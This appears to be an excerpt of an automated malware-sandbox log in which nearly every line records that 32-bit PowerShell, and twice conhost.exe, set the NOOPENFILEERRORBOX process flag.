          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
